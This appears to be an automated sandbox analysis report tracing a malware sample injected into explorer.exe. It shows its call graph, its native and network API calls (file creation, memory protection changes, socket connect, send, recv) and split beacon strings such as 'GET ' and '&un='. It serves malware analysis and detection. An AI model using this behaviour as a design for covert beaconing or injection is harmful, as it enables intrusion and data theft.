13690->13679 13690->13685 13693 107ce67a 13691->13693 13692 107ce67e 13692->13680 13693->13692 13694 107d9e12 NtProtectVirtualMemory 13693->13694 13694->13693 13699 107d8942 13695->13699 13697 107d9e45 NtProtectVirtualMemory 13698 107d9e70 13697->13698 13698->13686 13700 107d8967 13699->13700 13700->13697 13702 107d43c7 13701->13702 13705 107d4232 13702->13705 13704 107d4438 13704->13617 13706 107d425e 13705->13706 13709 107d38c2 13706->13709 13708 107d426b 13708->13704 13710 107d3934 13709->13710 13711 107d39a6 13710->13711 13712 107d3995 ObtainUserAgentString 13710->13712 13711->13708 13712->13711 13762 107ce42e 13763 107ce45b 13762->13763 13771 107ce4c9 13762->13771 13764 107d8232 NtCreateFile 13763->13764 13763->13771 13765 107ce496 13764->13765 13766 107ce082 NtCreateFile 13765->13766 13770 107ce4c5 13765->13770 13768 107ce4b6 13766->13768 13767 107d8232 NtCreateFile 13767->13771 13769 107cdf52 NtCreateFile 13768->13769 13768->13770 13769->13770 13770->13767 13770->13771 13920 107d572e 13921 107d5788 connect 13920->13921 13922 107d576a 13920->13922 13922->13921 13876 107daaa9 13877 107daaaf 13876->13877 13880 107d5212 13877->13880 13879 107daac7 13881 107d521b 13880->13881 13882 107d5237 13880->13882 13881->13882 13883 107d50c2 6 API calls 13881->13883 13882->13879 13883->13882 13772 107d422a 13773 107d425e 13772->13773 13774 107d38c2 ObtainUserAgentString 13773->13774 13775 107d426b 13774->13775 13826 107d52e4 13827 107d536f 13826->13827 13828 107d5305 13826->13828 13828->13827 13830 107d50c2 13828->13830 13831 107d51f0 13830->13831 13832 107d50cb 13830->13832 13831->13827 13832->13831 13833 107d8f82 6 API calls 13832->13833 13833->13831 13900 107cfb66 13901 107cfb6a 13900->13901 13902 107cfcce 13901->13902 13903 107cfcb5 CreateMutexW 13901->13903 13903->13902 13834 107d2ce2 13836 107d2dd9 13834->13836 13835 107d3022 13836->13835 13840 107d2352 13836->13840 13838 107d2f0d 13838->13835 13849 107d2792 13838->13849 13842 107d239e 13840->13842 13841 107d258e 13841->13838 13842->13841 13843 107d24ec 13842->13843 13845 107d2595 13842->13845 13844 107d8232 NtCreateFile 13843->13844 13847 107d24ff 13844->13847 13845->13841 13846 107d8232 NtCreateFile 13845->13846 13846->13841 13847->13841 13848 107d8232 NtCreateFile 13847->13848 13848->13841 13850 107d27e0 13849->13850 13851 107d8232 NtCreateFile 13850->13851 13854 107d290c 13851->13854 13852 107d2af3 13852->13838 13853 107d2352 NtCreateFile 13853->13854 13854->13852 13854->13853 13855 107d2602 NtCreateFile 13854->13855 13855->13854 13856 107d0edd 13858 107d0f06 13856->13858 13857 107d0fa4 13858->13857 13859 107cd8f2 NtProtectVirtualMemory 13858->13859 13860 107d0f9c 13859->13860 13861 107d4382 ObtainUserAgentString 13860->13861 13861->13857 13474 107cd2dd 13475 107cd31a 13474->13475 13476 107cd3fa 13475->13476 13477 107cd328 SleepEx 13475->13477 13481 107d7f12 13475->13481 13490 107ce432 13475->13490 13500 107cd0f2 13475->13500 13477->13475 13477->13477 13484 107d7f48 13481->13484 13482 107d8134 13482->13475 13483 107d80e9 13486 107d8125 13483->13486 13518 107d7842 13483->13518 13484->13482 13484->13483 13489 107d8232 NtCreateFile 13484->13489 13506 107d8f82 13484->13506 13526 107d7922 13486->13526 13489->13484 13491 107ce45b 13490->13491 13498 107ce4c9 13490->13498 13492 107d8232 NtCreateFile 13491->13492 13491->13498 13493 107ce496 13492->13493 13494 107ce4c5 13493->13494 13547 107ce082 13493->13547 13496 107d8232 NtCreateFile 13494->13496 13494->13498 13496->13498 13497 107ce4b6 13497->13494 13556 107cdf52 13497->13556 13498->13475 13501 107cd1d3 13500->13501 13502 107cd109 13500->13502 13501->13475 13561 107cd012 13502->13561 13504 107cd113 13504->13501 13505 107d8f82 6 API calls 13504->13505 13505->13501 13507 107d8fb8 13506->13507 13509 107d9081 13507->13509 13517 107d9022 13507->13517 13534 107d55b2 13507->13534 13510 107d9134 13509->13510 13512 107d9117 getaddrinfo 13509->13512 13509->13517 13516 107d91b2 13510->13516 13510->13517 13537 107d5732 13510->13537 13512->13510 13514 107d97f4 setsockopt recv 13514->13517 13515 107d9729 13515->13514 13515->13517 13516->13517 13540 107d56b2 13516->13540 13517->13484 13519 107d786d 13518->13519 13543 107d8232 13519->13543 13521 107d7906 13521->13483 13522 107d7888 13522->13521 13523 107d8f82 6 API calls 13522->13523 13524 107d78c5 13522->13524 13523->13524 13524->13521 13525 107d8232 NtCreateFile 13524->13525 13525->13521 13527 107d79c2 13526->13527 13528 107d8232 NtCreateFile 13527->13528 13531 107d79d6 13528->13531 13529 107d7a9f 13529->13482 13530 107d7a5d 13530->13529 13532 107d8232 NtCreateFile 13530->13532 13531->13529 13531->13530 13533 107d8f82 6 API calls 13531->13533 13532->13529 13533->13530 13535 107d55ec 13534->13535 13536 107d560a socket 13534->13536 13535->13536 13536->13509 13538 107d5788 connect 13537->13538 13539 107d576a 13537->13539 13538->13516 13539->13538 13541 107d5705 send 13540->13541 13542 107d56e7 13540->13542 13541->13515 13542->13541 13545 107d825c 13543->13545 13546 107d8334 13543->13546 13544 107d8410 NtCreateFile 13544->13546 13545->13544 13545->13546 13546->13522 13548 107ce420 13547->13548 13549 107ce0aa 13547->13549 13548->13497 13549->13548 13550 107d8232 NtCreateFile 13549->13550 13552 107ce1f9 13550->13552 13551 107ce3df 13551->13497 13552->13551 13553 107d8232 NtCreateFile 13552->13553 13554 107ce3c9 13553->13554 13555 107d8232 NtCreateFile 13554->13555 13555->13551 13557 107cdf70 13556->13557 13558 107cdf84 13556->13558 13557->13494 13559 107d8232 NtCreateFile 13558->13559 13560 107ce046 13559->13560 13560->13494 13562 107cd031 13561->13562 13563 107cd0cd 13562->13563 13564 107d8f82 6 API calls 13562->13564 13563->13504 13564->13563 13776 107daa1f 13777 107daa25 13776->13777 13780 107ce5f2 13777->13780 13779 107daa3d 13781 107ce60e 13780->13781 13782 107ce5fb 13780->13782 13781->13779 13782->13781 13783 107d3662 6 API calls 13782->13783 13783->13781 13939 107d0dd9 13940 107d0df0 13939->13940 13941 107d4382 ObtainUserAgentString 13940->13941 13942 107d0ecd 13940->13942 13941->13942 13862 107d2cd4 13864 107d2cd8 13862->13864 13863 107d3022 13864->13863 13865 107d2352 NtCreateFile 13864->13865 13866 107d2f0d 13865->13866 13866->13863 13867 107d2792 NtCreateFile 13866->13867 13867->13866 13717 107d9e12 13718 107d8942 13717->13718 13719 107d9e45 NtProtectVirtualMemory 13718->13719 13720 107d9e70 13719->13720 13784 107ce613 13786 107ce620 13784->13786 13785 107ce67e 13786->13785 13787 107d9e12 NtProtectVirtualMemory 13786->13787 13787->13786 13737 107daa4d 13738 107daa53 13737->13738 13741 107ce782 13738->13741 13740 107daa6b 13743 107ce78f 13741->13743 13742 107ce7ad 13742->13740 13743->13742 13745 107d3662 13743->13745 13746 107d366b 13745->13746 13754 107d37ba 13745->13754 13747 107cd0f2 6 API calls 13746->13747 13746->13754 13749 107d36ee 13747->13749 13748 107d3750 13751 107d383f 13748->13751 13753 107d3791 13748->13753 13748->13754 13749->13748 13750 107d8f82 6 API calls 13749->13750 13750->13748 13752 107d8f82 6 API calls 13751->13752 13751->13754 13752->13754 13753->13754 13755 107d8f82 6 API calls 13753->13755 13754->13742 13755->13754 13788 107d9e0a 13789 107d9e45 NtProtectVirtualMemory 13788->13789 13790 107d8942 13788->13790 13791 107d9e70 13789->13791 13790->13789 13904 107d214a 13905 107d2153 13904->13905 13910 107d2174 13904->13910 13906 107d4382 ObtainUserAgentString 13905->13906 13908 107d216c 13906->13908 13907 107d21e7 13909 107cd0f2 6 API calls 13908->13909 13909->13910 13910->13907 13912 107cd1f2 13910->13912 13913 107cd2c9 13912->13913 13914 107cd20f 13912->13914 13913->13910 13915 107d7f12 7 API calls 13914->13915 13917 107cd242 13914->13917 13915->13917 13916 107cd289 13916->13913 13918 107cd0f2 6 API calls 13916->13918 13917->13916 13919 107ce432 NtCreateFile 13917->13919 13918->13913 13919->13916 13725 107d8f82 13726 107d8fb8 13725->13726 13727 107d55b2 socket 13726->13727 13728 107d9081 13726->13728 13736 107d9022 13726->13736 13727->13728 13729 107d9134 13728->13729 13731 107d9117 getaddrinfo 13728->13731 13728->13736 13730 107d5732 connect 13729->13730 13735 107d91b2 13729->13735 13729->13736 13730->13735 13731->13729 13732 107d56b2 send 13734 107d9729 13732->13734 13733 107d97f4 setsockopt recv 13733->13736 13734->13733 13734->13736 13735->13732 13735->13736

                                            Executed Functions

                                            Function 107D8F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 107d8f82-107d8fb6 1 107d8fb8-107d8fbc 0->1 2 107d8fd6-107d8fd9 0->2 1->2 5 107d8fbe-107d8fc2 1->5 3 107d8fdf-107d8fed 2->3 4 107d98fe-107d990c 2->4 6 107d98f6-107d98f7 3->6 7 107d8ff3-107d8ff7 3->7 5->2 8 107d8fc4-107d8fc8 5->8 6->4 9 107d8fff-107d9000 7->9 10 107d8ff9-107d8ffd 7->10 8->2 11 107d8fca-107d8fce 8->11 13 107d900a-107d9010 9->13 10->9 10->13 11->2 12 107d8fd0-107d8fd4 11->12 12->2 12->3 14 107d903a-107d9060 13->14 15 107d9012-107d9020 13->15 16 107d9068-107d907c call 107d55b2 14->16 17 107d9062-107d9066 14->17 15->14 18 107d9022-107d9026 15->18 22 107d9081-107d90a2 16->22 17->16 19 107d90a8-107d90ab 17->19 18->6 20 107d902c-107d9035 18->20 23 107d9144-107d9150 19->23 24 107d90b1-107d90b8 19->24 20->6 22->19 25 107d98ee-107d98ef 22->25 23->25 26 107d9156-107d9165 23->26 27 107d90ba-107d90dc call 107d8942 24->27 28 107d90e2-107d90f5 24->28 25->6 30 107d917f-107d918f 26->30 31 107d9167-107d9178 call 107d5552 26->31 27->28 28->25 29 107d90fb-107d9101 28->29 29->25 34 107d9107-107d9109 29->34 36 107d91e5-107d921b 30->36 37 107d9191-107d91ad call 107d5732 30->37 31->30 34->25 40 107d910f-107d9111 34->40 38 107d922d-107d9231 36->38 39 107d921d-107d922b 36->39 47 107d91b2-107d91da 37->47 44 107d9247-107d924b 38->44 45 107d9233-107d9245 38->45 43 107d927f-107d9280 39->43 40->25 46 107d9117-107d9132 getaddrinfo 40->46 52 107d9283-107d92e0 call 107d9d62 call 107d6482 call 107d5e72 call 107da002 43->52 49 107d924d-107d925f 44->49 50 107d9261-107d9265 44->50 45->43 46->23 51 107d9134-107d913c 46->51 47->36 48 107d91dc-107d91e1 47->48 48->36 49->43 53 107d926d-107d9279 50->53 54 107d9267-107d926b 50->54 51->23 63 107d92f4-107d9354 call 107d9d92 52->63 64 107d92e2-107d92e6 52->64 53->43 54->52 54->53 69 107d948c-107d94b8 call 107d9d62 call 107da262 63->69 70 107d935a-107d9396 call 107d9d62 call 107da262 call 107da002 63->70 64->63 65 107d92e8-107d92ef call 107d6042 64->65 65->63 79 107d94d9-107d9590 call 107da262 * 3 call 107da002 * 2 call 107d6482 69->79 80 107d94ba-107d94d5 69->80 84 107d9398-107d93b7 call 107da262 call 107da002 70->84 85 107d93bb-107d93e9 call 107da262 * 2 70->85 110 107d9595-107d95b9 call 107da262 79->110 80->79 84->85 101 107d93eb-107d9410 call 107da002 call 107da262 85->101 102 107d9415-107d941d 85->102 101->102 103 107d941f-107d9425 102->103 104 107d9442-107d9448 102->104 107 107d9467-107d9487 call 107da262 103->107 108 107d9427-107d943d 103->108 109 107d944e-107d9456 104->109 104->110 107->110 108->110 109->110 113 107d945c-107d945d 109->113 120 107d95bb-107d95cc call 107da262 call 107da002 110->120 121 107d95d1-107d96ad call 107da262 * 7 call 107da002 call 107d9d62 call 107da002 call 107d5e72 call 107d6042 110->121 113->107 132 107d96af-107d96b3 120->132 121->132 134 107d96ff-107d972d call 107d56b2 132->134 135 107d96b5-107d96fa call 107d5382 call 107d57b2 132->135 144 107d975d-107d9761 134->144 145 107d972f-107d9735 134->145 153 107d98e6-107d98e7 135->153 150 107d990d-107d9913 144->150 151 107d9767-107d976b 144->151 145->144 149 107d9737-107d974c 145->149 149->144 154 107d974e-107d9754 149->154 155 107d9779-107d9784 150->155 156 107d9919-107d9920 150->156 157 107d98aa-107d98df call 107d57b2 151->157 158 107d9771-107d9773 151->158 153->25 154->144 163 107d9756 154->163 159 107d9795-107d9796 155->159 160 107d9786-107d9793 155->160 156->160 157->153 158->155 158->157 164 107d979c-107d97a0 159->164 160->159 160->164 163->144 167 107d97b1-107d97b2 164->167 168 107d97a2-107d97af 164->168 170 107d97b8-107d97c4 167->170 168->167 168->170 173 107d97f4-107d9861 setsockopt recv 170->173 174 107d97c6-107d97ef call 107d9d92 call 107d9d62 170->174 177 107d98a3-107d98a4 173->177 178 107d9863 173->178 174->173 177->157 178->177 181 107d9865-107d986a 178->181 181->177 184 107d986c-107d9872 181->184 184->177 186 107d9874-107d98a1 184->186 186->177 186->178
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: getaddrinforecvsetsockopt
                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                            • API String ID: 1564272048-1117930895
                                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                            • Instruction ID: 5ade831bdb9855766bae6e84df96c6cb2c262b277b9b2683e63c3a6362b7fc42
                                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                            • Instruction Fuzzy Hash: A2528F34618B488BC759EF68D4847DAB7E2FB94300F50462ED49FD7246EE34B946CB81
                                            Function 107D8232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 299 107d8232-107d8256 300 107d88bd-107d88cd 299->300 301 107d825c-107d8260 299->301 301->300 302 107d8266-107d82a0 301->302 303 107d82bf 302->303 304 107d82a2-107d82a6 302->304 305 107d82c6 303->305 304->303 306 107d82a8-107d82ac 304->306 307 107d82cb-107d82cf 305->307 308 107d82ae-107d82b2 306->308 309 107d82b4-107d82b8 306->309 310 107d82f9-107d830b 307->310 311 107d82d1-107d82f7 call 107d8942 307->311 308->305 309->307 312 107d82ba-107d82bd 309->312 316 107d8378 310->316 317 107d830d-107d8332 310->317 311->310 311->316 312->307 318 107d837a-107d83a0 316->318 319 107d8334-107d833b 317->319 320 107d83a1-107d83a8 317->320 323 107d833d-107d8360 call 107d8942 319->323 324 107d8366-107d8370 319->324 321 107d83aa-107d83d3 call 107d8942 320->321 322 107d83d5-107d83dc 320->322 321->316 321->322 326 107d83de-107d840a call 107d8942 322->326 327 107d8410-107d8458 NtCreateFile call 107d8172 322->327 323->324 324->316 329 107d8372-107d8373 324->329 326->316 326->327 335 107d845d-107d845f 327->335 329->316 335->316 336 107d8465-107d846d 335->336 336->316 337 107d8473-107d8476 336->337 338 107d8478-107d8481 337->338 339 107d8486-107d848d 337->339 338->318 340 107d848f-107d84b8 call 107d8942 339->340 341 107d84c2-107d84ec 339->341 340->316 346 107d84be-107d84bf 340->346 347 107d88ae-107d88b8 341->347 348 107d84f2-107d84f5 341->348 346->341 347->316 349 107d84fb-107d84fe 348->349 350 107d8604-107d8611 348->350 351 107d855e-107d8561 349->351 352 107d8500-107d8507 349->352 350->318 354 107d8567-107d8572 351->354 355 107d8616-107d8619 351->355 356 107d8509-107d8532 call 107d8942 352->356 357 107d8538-107d8559 352->357 360 107d8574-107d859d call 107d8942 354->360 361 107d85a3-107d85a6 354->361 363 107d861f-107d8626 355->363 364 107d86b8-107d86bb 355->364 356->316 356->357 359 107d85e9-107d85fa 357->359 359->350 360->316 360->361 361->316 368 107d85ac-107d85b6 361->368 365 107d8628-107d8651 call 107d8942 363->365 366 107d8657-107d866b call 107d9e92 363->366 369 107d86bd-107d86c4 364->369 370 107d8739-107d873c 364->370 365->316 365->366 366->316 387 107d8671-107d86b3 366->387 368->316 377 107d85bc-107d85e6 368->377 378 107d86f5-107d8734 369->378 379 107d86c6-107d86ef call 107d8942 369->379 374 107d87c4-107d87c7 370->374 375 107d8742-107d8749 370->375 374->316 384 107d87cd-107d87d4 374->384 382 107d874b-107d8774 call 107d8942 375->382 383 107d877a-107d87bf 375->383 377->359 394 107d8894-107d88a9 378->394 379->347 379->378 382->347 382->383 383->394 389 107d87fc-107d8803 384->389 390 107d87d6-107d87f6 call 107d8942 384->390 387->318 392 107d882b-107d8835 389->392 393 107d8805-107d8825 call 107d8942 389->393 390->389 392->347 399 107d8837-107d883e 392->399 393->392 394->318 399->347 403 107d8840-107d8886 399->403 403->394
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: `
                                            • API String ID: 823142352-2679148245
                                            • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                            • Instruction ID: 0f6ac74fb45f38162913efc8021b37eb9f9b8f41884aa8ed0c4da6bd7ac257e6
                                            • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                            • Instruction Fuzzy Hash: 82224E70A18B499FCB89DF68C8996AEF7E1FB58301F51022EE45ED7250DB30E851CB85
                                            Function 107D9E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 443 107d9e12-107d9e6e call 107d8942 NtProtectVirtualMemory 446 107d9e7d-107d9e8f 443->446 447 107d9e70-107d9e7c 443->447
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL ref: 107D9E67
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                            • Instruction ID: 5237a3c6b08d52085ca6213b253d0783d72da869f97c31c6b2e2ed573c6b2e2d
                                            • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                            • Instruction Fuzzy Hash: 1F01B134628B884F8788EFACE48512AB7E4FBCD314F000B3EE99AC3250EB70D5414742
                                            Function 107D9E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 448 107d9e0a-107d9e38 449 107d9e45-107d9e6e NtProtectVirtualMemory 448->449 450 107d9e40 call 107d8942 448->450 451 107d9e7d-107d9e8f 449->451 452 107d9e70-107d9e7c 449->452 450->449
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL ref: 107D9E67
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                            • Instruction ID: 2acc176fdabe450e145c0743b07f107eff4ff8c26a19d927515bfa0207b2621b
                                            • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                            • Instruction Fuzzy Hash: 5601A234628B884B8788EB6C94552A6B3E5FBCE314F000B3EE9DAC3240DB21D5024782
                                            Function 107D38C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • ObtainUserAgentString.URLMON ref: 107D39A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: AgentObtainStringUser
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 2681117516-319646191
                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction ID: ee32a47e40e52139670f01eb9dcc73135ce9996e82b5f5ecf8c47b5029d95f2b
                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction Fuzzy Hash: 7C31D471614B0C8BCB44EFA8D8897EEB7E5FB58205F40422AE54ED7340DF749A45C789
                                            Function 107D38BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • ObtainUserAgentString.URLMON ref: 107D39A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: AgentObtainStringUser
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 2681117516-319646191
                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction ID: c716357c08ba0f8f995ad392ee32851faaaefb986bf847ef7757c02a0bbbe293
                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction Fuzzy Hash: 7421E670610B4C8BCB44EFA8D8997ED7BE5FF58205F40422AE45AE7340DF749A45C789
                                            Function 107CFB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID: .dll$el32$kern
                                            • API String ID: 1964310414-1222553051
                                            • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                            • Instruction ID: b5562736a3e98664c6c7069d26277373a44c041d92389eea99f7fa35c11f6c81
                                            • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                            • Instruction Fuzzy Hash: C5416A74918A08CFDB84EFA8C8997AD77E0FB68300F04417AD84EDB255EE309945CB85
                                            Function 107CFB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID: .dll$el32$kern
                                            • API String ID: 1964310414-1222553051
                                            • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                            • Instruction ID: 883e29fda6cbaf929a8cf7ec8f2426cf0b59e62d729d0637032533f3ece4c2b9
                                            • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                            • Instruction Fuzzy Hash: 97415974A18A0CCFDB84EFA8D499BAD77E1FB68300F04416AD84EDB255DE30A945CB85
                                            Function 107D572E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 289 107d572e-107d5768 290 107d5788-107d57ab connect 289->290 291 107d576a-107d5782 call 107d8942 289->291 291->290
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                            • Instruction ID: a14b9d0a4422b859afebef8c97ab661bbb331bb6a48324b8ffce2372b803e2ae
                                            • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                            • Instruction Fuzzy Hash: 56015E30618B188FCB84EF5CE088B55B7E0FB58324F1545AEE90DCB226C674D8818BC2
                                            Function 107D5732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 294 107d5732-107d5768 295 107d5788-107d57ab connect 294->295 296 107d576a-107d5782 call 107d8942 294->296 296->295
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                            • Instruction ID: ad6b9ce2c72461b5d32692ed09631f136de66e4c3e688377921b8901de44b71b
                                            • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                            • Instruction Fuzzy Hash: 8F012170618A1C8FCB84EF5CE048B5577E0FB59314F1545AEA80DCB226C674D9818BC2
                                            Function 107D56B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 407 107d56b2-107d56e5 408 107d5705-107d572d send 407->408 409 107d56e7-107d56ff call 107d8942 407->409 409->408
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID: send
                                            • API String ID: 2809346765-2809346765
                                            • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                            • Instruction ID: e6f2eff88ee244b323e725f434bc3e2530b7969cdd9b2220261938e64b20df34
                                            • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                            • Instruction Fuzzy Hash: A9011270518A188FDBC4DF5CE449B2577E0EB58314F1645AED85DCB366C670D8818B85
                                            Function 107D55B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 412 107d55b2-107d55ea 413 107d55ec-107d5604 call 107d8942 412->413 414 107d560a-107d562b socket 412->414 413->414
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: socket
                                            • String ID: sock
                                            • API String ID: 98920635-2415254727
                                            • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                            • Instruction ID: 05b81daf2063f8cb56f48f83051aacc0ca91c190a35e2231d4ebdbe3b24bac78
                                            • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                            • Instruction Fuzzy Hash: 3F017C30618B188FCB84EF5CE048B50BBE0FB59314F1545AEE84ECB326C7B0C9818B86
                                            Function 107CD2DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                            Download Yara Rule

